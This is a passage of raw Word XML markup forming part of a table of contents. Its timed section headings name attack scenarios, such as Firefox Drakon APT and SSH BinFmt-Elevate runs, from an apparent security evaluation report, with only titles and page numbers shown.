                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc12599995 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="123F0478" w14:textId="1D58ED6E" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="960"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:b w:val="0"/>
              <w:bCs w:val="0"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12599996" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.2</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>12:58 -- TA5.2 Windows 2 -- Firefox Drakon APT Sysinfo</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc12599996 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="169B2C5D" w14:textId="20770DAB" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1200"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12599997" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.2.1</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Targets</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc12599997 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5A01AB2C" w14:textId="3DFAB5AE" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1200"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12599998" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.2.2</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Capabilities</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc12599998 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0D10AA74" w14:textId="7C46A68B" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1200"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12599999" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.2.3</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Event Log</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc12599999 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5367D418" w14:textId="7C865596" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="960"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:b w:val="0"/>
              <w:bCs w:val="0"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600000" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.3</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>14:37 -- TA5.2 Windows 1 -- Firefox Drakon APT Elevate Copykatz 1</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc12600000 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="51408026" w14:textId="119CE8B0" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1200"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600001" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.3.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001 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>14</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="32810D12" w14:textId="5CA01060" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1200"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600002" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.3.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002 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>14</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1BDF2829" w14:textId="73DED3F5" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1200"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600003" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.3.3</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Event Log</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc12600003 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>14</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5B145E59" w14:textId="74C949C5" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="960"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:b w:val="0"/>
              <w:bCs w:val="0"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600004" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.4</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>14:54 -- TA5.2 Ubuntu 1 -- SSH BinFmt-Elevate</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc12600004 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>15</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="377451AD" w14:textId="0C7B7F34" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1200"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600005" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.4.1</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Target</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc12600005 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>15</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="046E2F6B" w14:textId="589240A5" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1200"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600006" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.4.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006 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>15</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="121DDFFC" w14:textId="5AEBC1AA" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1200"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600007" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.4.3</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Event Log</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc12600007 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>15</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1F267E4C" w14:textId="483F9206" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
